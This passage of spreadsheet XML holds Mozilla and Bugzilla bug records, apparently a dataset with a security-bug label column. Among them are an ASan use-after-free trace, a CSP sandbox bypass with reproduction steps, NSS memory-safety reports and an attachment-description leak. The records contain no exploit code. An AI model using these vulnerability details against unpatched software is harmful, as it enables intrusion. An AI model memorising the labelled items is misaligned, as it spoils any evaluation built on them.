    #34 0x7f239d27ab76 in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) src/dom/base/nsGlobalWindow.cpp:9621
    #35 0x7f239d2326c4 in nsGlobalWindow::RunTimeout(nsTimeout*) src/dom/base/nsGlobalWindow.cpp:9880
    #36 0x7f239d278a28 in nsGlobalWindow::TimerCallback(nsITimer*, void*) src/dom/base/nsGlobalWindow.cpp:10147
    #37 0x7f23a4def972 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:473
    #38 0x7f23a4df0e7a in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:556
    #39 0x7f23a4db4580 in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:612
    #40 0x7f23a4a46ecb in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #41 0x7f23a34903b6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #42 0x7f23a506ce11 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:208
    #43 0x7f23a506cc46 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:201
    #44 0x7f23a506cb2b in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:175
    #45 0x7f23a2937dda in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #46 0x7f23a156a9b4 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:290
    #47 0x7f2397bdda4d in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3782
    #48 0x7f2397be38c5 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3848
    #49 0x7f2397be6774 in XRE_main src/toolkit/xre/nsAppRunner.cpp:3923
    #50 0x40d013 in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #51 0x40a755 in main src/browser/app/nsBrowserApp.cpp:279
    #52 0x7f23b5adbc4c in ?? ??:0
0x7f236f299db8 is located 56 bytes inside of 120-byte region [0x7f236f299d80,0x7f236f299df8)
freed by thread T0 here:
    #0 0x4c4af0 in free ??:0
    #1 0x7f23b2967586 in moz_free src/memory/mozalloc/mozalloc.cpp:51
    #2 0x7f239b3afccd in operator delete(void*) src/../../../dist/include/mozilla/mozalloc.h:224
    #3 0x7f239b28424d in nsNodeUtils::LastRelease(nsINode*) src/content/base/src/nsNodeUtils.cpp:260
    #4 0x7f239b138dfd in nsGenericDOMDataNode::Release() src/content/base/src/nsGenericDOMDataNode.cpp:113
    #5 0x7f239b3b00d7 in nsTextNode::Release() src/content/base/src/nsTextNode.cpp:125
    #6 0x7f239b3b018b in non-virtual thunk to nsTextNode::Release() src/gfx/cairo/cairo/src/cairo-surface-subsurface.c:0
    #7 0x7f2397ba18db in ~nsCOMPtr_base src/../../dist/include/nsCOMPtr.h:408
    #8 0x7f2399415899 in nsCOMPtr&lt;nsIDOMNode&gt;::~nsCOMPtr() src/../../../dist/include/nsCOMPtr.h:447
    #9 0x7f2399402ab6 in nsCOMPtr&lt;nsIDOMNode&gt;::~nsCOMPtr() src/../../../dist/include/nsCOMPtr.h:447
    #10 0x7f239e64ff9d in nsHTMLEditor::IsVisTextNode(nsIContent*, bool*, bool) src/editor/libeditor/html/nsHTMLEditor.cpp:4408
    #11 0x7f239e64e47a in nsHTMLEditor::IsTextInDirtyFrameVisible(nsIContent*) src/editor/libeditor/html/nsHTMLEditor.cpp:4348
    #12 0x7f239e11704e in nsEditor::IsEditable(nsIContent*) src/editor/libeditor/base/nsEditor.cpp:3742
    #13 0x7f239e67039c in nsHTMLEditor::IsEditable(nsIContent*) src/editor/libeditor/html/nsHTMLEditor.cpp:5459
    #14 0x7f239e110a91 in nsEditor::FindNode(nsINode*, bool, bool, bool) src/editor/libeditor/base/nsEditor.cpp:3407
    #15 0x7f239e10ca79 in nsEditor::GetPriorNode(nsINode*, bool, bool) src/editor/libeditor/base/nsEditor.cpp:3301
    #16 0x7f239e10c106 in nsEditor::GetPriorNode(nsINode*, int, bool, bool) src/editor/libeditor/base/nsEditor.cpp:3190
    #17 0x7f239e649789 in nsHTMLEditor::GetPriorHTMLNode(nsINode*, int, bool) src/editor/libeditor/html/nsHTMLEditor.cpp:4104
    #18 0x7f239e7c3182 in nsHTMLEditRules::GetPromotedPoint(nsHTMLEditRules::RulesEndpoint, nsIDOMNode*, int, EditAction, nsCOMPtr&lt;nsIDOMNode&gt;*, int*) src/editor/libeditor/html/nsHTMLEditRules.cpp:5277
    #19 0x7f239e6d078e in nsHTMLEditRules::PromoteRange(nsIDOMRange*, EditAction) src/editor/libeditor/html/nsHTMLEditRules.cpp:5493
    #20 0x7f239e6cac26 in nsHTMLEditRules::AfterEditInner(EditAction, short) src/editor/libeditor/html/nsHTMLEditRules.cpp:430
    #21 0x7f239e6c8df6 in nsHTMLEditRules::AfterEdit(EditAction, short) src/editor/libeditor/html/nsHTMLEditRules.cpp:376
    #22 0x7f239e63798c in nsHTMLEditor::EndOperation() src/editor/libeditor/html/nsHTMLEditor.cpp:3513
    #23 0x7f239e06d372 in ~nsAutoRules src/editor/libeditor/base/nsEditorUtils.h:94
    #24 0x7f239e04afc6 in ~nsAutoRules src/editor/libeditor/base/nsEditorUtils.h:91
    #25 0x7f239e610e37 in nsHTMLEditor::Align(nsAString_internal const&amp;) src/editor/libeditor/html/nsHTMLEditor.cpp:2264
    #26 0x7f239e610fee in non-virtual thunk to nsHTMLEditor::Align(nsAString_internal const&amp;) src/gfx/cairo/cairo/src/cairo-surface-subsurface.c:0
    #27 0x7f23a1b430b0 in nsAlignCommand::SetState(nsIEditor*, nsString&amp;) src/editor/composer/src/nsComposerCommands.cpp:970
    #28 0x7f23a1b37113 in nsMultiStateCommand::DoCommandParams(char const*, nsICommandParams*, nsISupports*) src/editor/composer/src/nsComposerCommands.cpp:599
    #29 0x7f23a13912e2 in nsControllerCommandTable::DoCommandParams(char const*, nsICommandParams*, nsISupports*) src/embedding/components/commandhandler/src/nsControllerCommandTable.cpp:175
previously allocated by thread T0 here:
    #0 0x4c4bb0 in __interceptor_malloc ??:0
    #1 0x7f23b29676da in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:57
    #2 0x7f239b3af0d0 in operator new(unsigned long) src/../../../dist/include/mozilla/mozalloc.h:200
    #3 0x7f239e412cc7 in nsHtml5TreeOperation::AppendText(unsigned short const*, unsigned int, nsIContent*, nsHtml5TreeOpExecutor*) src/parser/html/nsHtml5TreeOperation.cpp:163
    #4 0x7f239e41de8a in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) src/parser/html/nsHtml5TreeOperation.cpp:444
    #5 0x7f239e43ab75 in nsHtml5TreeOpExecutor::RunFlushLoop() src/parser/html/nsHtml5TreeOpExecutor.cpp:564
    #6 0x7f239e477259 in nsHtml5ExecutorFlusher::Run() src/parser/html/nsHtml5StreamParser.cpp:127
    #7 0x7f23a4db4580 in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:612
    #8 0x7f23a4a46ecb in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #9 0x7f23a34903b6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #10 0x7f23a506ce11 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:208
    #11 0x7f23a506cc46 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:201
    #12 0x7f23a506cb2b in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:175
    #13 0x7f23a2937dda in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #14 0x7f23a156a9b4 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:290
    #15 0x7f2397bdda4d in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3782
    #16 0x7f2397be38c5 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3848
    #17 0x7f2397be6774 in XRE_main src/toolkit/xre/nsAppRunner.cpp:3923
    #18 0x40d013 in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #19 0x40a755 in main src/browser/app/nsBrowserApp.cpp:279
    #20 0x7f23b5adbc4c in ?? ??:0
Shadow byte and word:
  0x1fe46de533b7: fd
  0x1fe46de533b0: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fe46de53390: 00 00 00 00 00 00 00 00
  0x1fe46de53398: 06 fb fb fb fb fb fb fb
  0x1fe46de533a0: fa fa fa fa fa fa fa fa
  0x1fe46de533a8: fa fa fa fa fa fa fa fa
=&gt;0x1fe46de533b0: fd fd fd fd fd fd fd fd
  0x1fe46de533b8: fd fd fd fd fd fd fd fd
  0x1fe46de533c0: fa fa fa fa fa fa fa fa
  0x1fe46de533c8: fa fa fa fa fa fa fa fa
  0x1fe46de533d0: 00 00 00 00 00 00 00 00
Stats: 260M malloced (302M for red zones) by 541116 calls
Stats: 44M realloced by 25176 calls
Stats: 227M freed by 312858 calls
Stats: 92M really freed by 204843 calls
Stats: 484M (123992 full pages) mmaped in 121 calls
  mmaps   by size class: 8:311277; 9:32764; 10:12285; 11:14329; 12:3072; 13:1536; 14:1536; 15:256; 16:1024; 17:1248; 18:144; 19:40; 20:20;
  mallocs by size class: 8:466783; 9:36490; 10:11191; 11:16795; 12:2871; 13:1975; 14:1888; 15:396; 16:1190; 17:1317; 18:159; 19:41; 20:20;
  frees   by size class: 8:255470; 9:27519; 10:7990; 11:13506; 12:2059; 13:1677; 14:1698; 15:352; 16:1127; 17:1300; 18:105; 19:38; 20:17;
  rfrees  by size class: 8:182058; 9:9100; 10:1831; 11:8659; 12:596; 13:527; 14:531; 15:179; 16:934; 17:399; 18:24; 19:4; 20:1;
Stats: malloc large: 1537 small slow: 2600
==10788== ABORTING</t>
        </is>
      </c>
      <c r="X5045" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5046">
      <c r="A5046" t="n">
        <v>1774654</v>
      </c>
      <c r="B5046" t="inlineStr">
        <is>
          <t>2022-06-16 10:52:05 -0700</t>
        </is>
      </c>
      <c r="C5046" t="inlineStr">
        <is>
          <t>tstclnt crashes when accessing gnutls server without a user cert in the database.</t>
        </is>
      </c>
      <c r="D5046" t="inlineStr">
        <is>
          <t>2023-01-13 01:22:54 -0800</t>
        </is>
      </c>
      <c r="E5046" t="n">
        <v>1</v>
      </c>
      <c r="F5046" t="n">
        <v>1</v>
      </c>
      <c r="G5046" t="n">
        <v>3</v>
      </c>
      <c r="H5046" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5046" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5046" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K5046" t="inlineStr">
        <is>
          <t>3.76</t>
        </is>
      </c>
      <c r="L5046" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5046" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5046" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5046" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5046" t="inlineStr">
        <is>
          <t>[nss-nofx]</t>
        </is>
      </c>
      <c r="Q5046" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R5046" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5046" t="inlineStr">
        <is>
          <t>3.87</t>
        </is>
      </c>
      <c r="T5046" t="n">
        <v>1</v>
      </c>
      <c r="U5046" t="n">
        <v>0</v>
      </c>
      <c r="V5046" t="n">
        <v>11</v>
      </c>
      <c r="W5046" t="inlineStr">
        <is>
          <t>Created attachment 9281679
nss-3.79-fix-client-cert-crash.patch
The patch for bug 1552254 contains an error where we check for a empty list, but the list is NULL. This can happen if the server requests a client auth cert, but the client has no certs in it's database. The crash happens in the default auth cert handler, which firefox overrides, so firefox does not have this issue, but other client applications (like tstclient) can crash. I'm including the upstream patch. I'll attach a phabricator patch shortly.</t>
        </is>
      </c>
      <c r="X5046" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5047">
      <c r="A5047" t="n">
        <v>782141</v>
      </c>
      <c r="B5047" t="inlineStr">
        <is>
          <t>2012-08-12 12:05:20 -0700</t>
        </is>
      </c>
      <c r="C5047" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow in nsSVGFEMorphologyElement::Filter</t>
        </is>
      </c>
      <c r="D5047" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:19 -0700</t>
        </is>
      </c>
      <c r="E5047" t="n">
        <v>1</v>
      </c>
      <c r="F5047" t="n">
        <v>1</v>
      </c>
      <c r="G5047" t="n">
        <v>3</v>
      </c>
      <c r="H5047" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5047" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5047" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K5047" t="inlineStr">
        <is>
          <t>17 Branch</t>
        </is>
      </c>
      <c r="L5047" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5047" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5047" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5047" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5047" t="inlineStr">
        <is>
          <t>[advisory-tracking+][qa-][asan]</t>
        </is>
      </c>
      <c r="Q5047" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5047" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5047" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T5047" t="n">
        <v>1</v>
      </c>
      <c r="U5047" t="n">
        <v>0</v>
      </c>
      <c r="V5047" t="n">
        <v>27</v>
      </c>
      <c r="W5047" t="inlineStr">
        <is>
          <t>Created attachment 651213
test-case triggering the crash (*.zip)
ASan detected heap-buffer-overflow on opt build f24229bc0ec8.</t>
        </is>
      </c>
      <c r="X5047" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5048">
      <c r="A5048" t="n">
        <v>1377426</v>
      </c>
      <c r="B5048" t="inlineStr">
        <is>
          <t>2017-06-30 04:30:28 -0700</t>
        </is>
      </c>
      <c r="C5048" t="inlineStr">
        <is>
          <t>Other CSP rules ignored when specifying sandbox 'allow-scripts'</t>
        </is>
      </c>
      <c r="D5048" t="inlineStr">
        <is>
          <t>2024-05-30 09:34:48 -0700</t>
        </is>
      </c>
      <c r="E5048" t="n">
        <v>1</v>
      </c>
      <c r="F5048" t="n">
        <v>1</v>
      </c>
      <c r="G5048" t="n">
        <v>3</v>
      </c>
      <c r="H5048" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5048" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5048" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K5048" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L5048" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5048" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5048" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5048" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5048" t="inlineStr">
        <is>
          <t>[domsecurity-active][adv-main55+][adv-esr52.3+]</t>
        </is>
      </c>
      <c r="Q5048" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5048" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5048" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T5048" t="n">
        <v>1</v>
      </c>
      <c r="U5048" t="n">
        <v>0</v>
      </c>
      <c r="V5048" t="n">
        <v>26</v>
      </c>
      <c r="W5048" t="inlineStr">
        <is>
          <t>Created attachment 8882535
firefox-csp-bug.zip
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Steps to reproduce:
I'm using a CSP rule (provided as a header, not meta tag) on a page or iframe, where the page contains a script, as follows:
Content-Security-Policy: sandbox allow-scripts; script-src 'none';
I tested this in Firefox 54 and the 55 beta on Linux 64 bit.
Actual results:
The script executes.
Expected results:
The script should not execute. If you remove the sandbox flag entirely from the CSP rule the script is blocked by the script-src 'none' rule. 
If you swap the identical sandbox rule to the iframe (if using an iframe) as an attribute on the iframe HTML (rather than via CSP) then the script is correctly blocked. My expectation would be for the behaviour here to be the same regardless of how you specify the sandboxing.
The example may seem contradictory (to specify allow-scripts to only then block all scripts) but I actually noticed this when attempting to both sandbox and limit scripts to a particular domain (rather than block off all scripts) but noticed that any script was being allowed through whenever the sandbox rule was present via CSP.
The scope of this issue may actually be wider than only allowing through scripts. 
I've attached a zip that should hopefully illustrate the basic issue (it includes a node/npm http server wrapper for convenience).</t>
        </is>
      </c>
      <c r="X5048" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5049">
      <c r="A5049" t="n">
        <v>1209546</v>
      </c>
      <c r="B5049" t="inlineStr">
        <is>
          <t>2015-09-29 08:06:45 -0700</t>
        </is>
      </c>
      <c r="C5049" t="inlineStr">
        <is>
          <t>Potential UAF in ssl3_HandleECDHServerKeyExchange</t>
        </is>
      </c>
      <c r="D5049" t="inlineStr">
        <is>
          <t>2016-07-02 11:18:49 -0700</t>
        </is>
      </c>
      <c r="E5049" t="n">
        <v>1</v>
      </c>
      <c r="F5049" t="n">
        <v>1</v>
      </c>
      <c r="G5049" t="n">
        <v>3</v>
      </c>
      <c r="H5049" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5049" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5049" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K5049" t="inlineStr">
        <is>
          <t>3.18</t>
        </is>
      </c>
      <c r="L5049" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5049" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5049" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5049" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5049" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main44+][adv-esr38.8+]</t>
        </is>
      </c>
      <c r="Q5049" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5049" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5049" t="inlineStr">
        <is>
          <t>3.21</t>
        </is>
      </c>
      <c r="T5049" t="n">
        <v>1</v>
      </c>
      <c r="U5049" t="n">
        <v>0</v>
      </c>
      <c r="V5049" t="n">
        <v>37</v>
      </c>
      <c r="W5049" t="inlineStr">
        <is>
          <t>If you look at the code, we have:
https://dxr.mozilla.org/mozilla-central/source/security/nss/lib/ssl/ssl3ecc.c#707
    ss-&gt;sec.peerKey = peerKey = PORT_ArenaZNew(arena, SECKEYPublicKey);
    if (peerKey == NULL) {
        goto no_memory;
    }
    peerKey-&gt;arena                 = arena;
    peerKey-&gt;keyType               = ecKey;
And then later:
   /* copy publicValue in peerKey */
    if (SECITEM_CopyItem(arena, &amp;peerKey-&gt;u.ec.publicValue,  &amp;ec_point))
    {
        PORT_FreeArena(arena, PR_FALSE);
        goto no_memory;
    }
The problem is that that ss-&gt;sec.peerKey is allocated out of arena and
has a pointer to arena. So if we then destroy it in:
https://dxr.mozilla.org/mozilla-central/source/security/nss/lib/ssl/sslsecur.c#1038
This looks like a potential UAF (following an OOM)</t>
        </is>
      </c>
      <c r="X5049" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5050">
      <c r="A5050" t="n">
        <v>445924</v>
      </c>
      <c r="B5050" t="inlineStr">
        <is>
          <t>2008-07-17 20:59:20 -0700</t>
        </is>
      </c>
      <c r="C5050" t="inlineStr">
        <is>
          <t>Fennec (XULRunner) should be using osso_initialize / osso_deinitialize</t>
        </is>
      </c>
      <c r="D5050" t="inlineStr">
        <is>
          <t>2009-08-26 08:12:52 -0700</t>
        </is>
      </c>
      <c r="E5050" t="n">
        <v>1</v>
      </c>
      <c r="F5050" t="n">
        <v>1</v>
      </c>
      <c r="G5050" t="n">
        <v>6</v>
      </c>
      <c r="H5050" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5050" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5050" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5050" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5050" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5050" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5050" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5050" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5050" t="inlineStr"/>
      <c r="Q5050" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5050" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5050" t="inlineStr">
        <is>
          <t>fennec1.0m6</t>
        </is>
      </c>
      <c r="T5050" t="n">
        <v>1</v>
      </c>
      <c r="U5050" t="n">
        <v>0</v>
      </c>
      <c r="V5050" t="n">
        <v>12</v>
      </c>
      <c r="W5050" t="inlineStr">
        <is>
          <t>Maemo docs seem to indicate that callss to osso_initialize and osso_deinitialize should be used in Maemo (Hildon) applications.
https://bugs.maemo.org/show_bug.cgi?id=876
http://wiki.forum.nokia.com/index.php/Maemo:_Hildonizing_application_UI#Registering_to_D-Bus
Currently, osso_initialize is not used anywhere in our code. This may be more of a problem when launching Fennec from the Extras &gt; Fennec shortcut because a DBus service file is used to do the launch.
"The application must be registered as a D-Bus service so that it will not be killed automatically by the system. This can be done with osso_initialize(). The first parameter needs to match the service name defined in the service file. Also remember to call osso_deinitialize() before exiting the application."</t>
        </is>
      </c>
      <c r="X5050" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5051">
      <c r="A5051" t="n">
        <v>37839</v>
      </c>
      <c r="B5051" t="inlineStr">
        <is>
          <t>2000-05-01 18:25:00 -0700</t>
        </is>
      </c>
      <c r="C5051" t="inlineStr">
        <is>
          <t>bug-helper has outdated list of mail components</t>
        </is>
      </c>
      <c r="D5051" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:21 -0800</t>
        </is>
      </c>
      <c r="E5051" t="n">
        <v>1</v>
      </c>
      <c r="F5051" t="n">
        <v>1</v>
      </c>
      <c r="G5051" t="n">
        <v>4</v>
      </c>
      <c r="H5051" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5051" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5051" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5051" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5051" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5051" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5051" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5051" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5051" t="inlineStr"/>
      <c r="Q5051" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5051" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5051" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T5051" t="n">
        <v>1</v>
      </c>
      <c r="U5051" t="n">
        <v>0</v>
      </c>
      <c r="V5051" t="n">
        <v>5</v>
      </c>
      <c r="W5051" t="inlineStr">
        <is>
          <t>The mail-components got shuffled recently, so now the bug-helper fails when
attempting to submit certain bugs.  What happens is that when one attempts to
submit a bug with components that no longer exist (eg "Front End" component of
"Mail News"), the following error is generated:
&gt; Possible bug database corruption has been detected. Please send mail to
&gt; dmose@mozilla.org with details of what you were doing when this message
&gt; appeared. Thank you. 
&gt; src = Account Manager Address Book Composition Filters Internationalization
&gt; Localization Mail Back End Mail Database Mail Window Front End MIME Networking
&gt; - General Networking - IMAP Networking - News Networking - POP Networking -
&gt; SMTP Printing Profile Migration Search Security: General Subscribe
&gt; default = Front End</t>
        </is>
      </c>
      <c r="X5051" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5052">
      <c r="A5052" t="n">
        <v>777586</v>
      </c>
      <c r="B5052" t="inlineStr">
        <is>
          <t>2012-07-25 17:33:17 -0700</t>
        </is>
      </c>
      <c r="C5052" t="inlineStr">
        <is>
          <t>[SECURITY] The description of private attachments is still visible to unauthorized users when mentioned in a comment</t>
        </is>
      </c>
      <c r="D5052" t="inlineStr">
        <is>
          <t>2012-07-26 23:28:22 -0700</t>
        </is>
      </c>
      <c r="E5052" t="n">
        <v>1</v>
      </c>
      <c r="F5052" t="n">
        <v>1</v>
      </c>
      <c r="G5052" t="n">
        <v>4</v>
      </c>
      <c r="H5052" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5052" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5052" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K5052" t="inlineStr">
        <is>
          <t>2.17.5</t>
        </is>
      </c>
      <c r="L5052" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5052" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5052" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5052" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5052" t="inlineStr"/>
      <c r="Q5052" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5052" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5052" t="inlineStr">
        <is>
          <t>Bugzilla 3.6</t>
        </is>
      </c>
      <c r="T5052" t="n">
        <v>1</v>
      </c>
      <c r="U5052" t="n">
        <v>0</v>
      </c>
      <c r="V5052" t="n">
        <v>6</v>
      </c>
      <c r="W5052" t="inlineStr">
        <is>
          <t>When a user who can see a private attachment (i.e. a member of the insidergroup) mentions a private attachment in a public comment, then all users who can see the public comment can also see the description of the private attachment despite they are not allowed to view this attachment (note that this attachment is not listed in the attachments table for that reason, unless you are a member of the insidergroup). The reason is that get_attachment_link() only checks if the bug itself is public or not to decide if the attachment description can be seen by the user or not, despite you can have private attachments on public bugs.
This problem exists since attachment IDs are linkified in comments, i.e since Bugzilla 2.17.5, see bug 153583.
I will probably fix this bug in the same patch as bug 777398.</t>
        </is>
      </c>
      <c r="X5052" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5053">
      <c r="A5053" t="n">
        <v>708115</v>
      </c>
      <c r="B5053" t="inlineStr">
        <is>
          <t>2011-12-06 15:18:00 -0800</t>
        </is>
      </c>
      <c r="C5053" t="inlineStr">
        <is>
          <t>bring up buildbot-master{19,20}</t>
        </is>
      </c>
      <c r="D5053" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5053" t="n">
        <v>1</v>
      </c>
      <c r="F5053" t="n">
        <v>1</v>
      </c>
      <c r="G5053" t="n">
        <v>5</v>
      </c>
      <c r="H5053" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5053" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5053" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5053" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5053" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5053" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5053" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5053" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5053" t="inlineStr">
        <is>
          <t>[buildmasters][capacity]</t>
        </is>
      </c>
      <c r="Q5053" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5053" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5053" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5053" t="n">
        <v>1</v>
      </c>
      <c r="U5053" t="n">
        <v>0</v>
      </c>
      <c r="V5053" t="n">
        <v>8</v>
      </c>
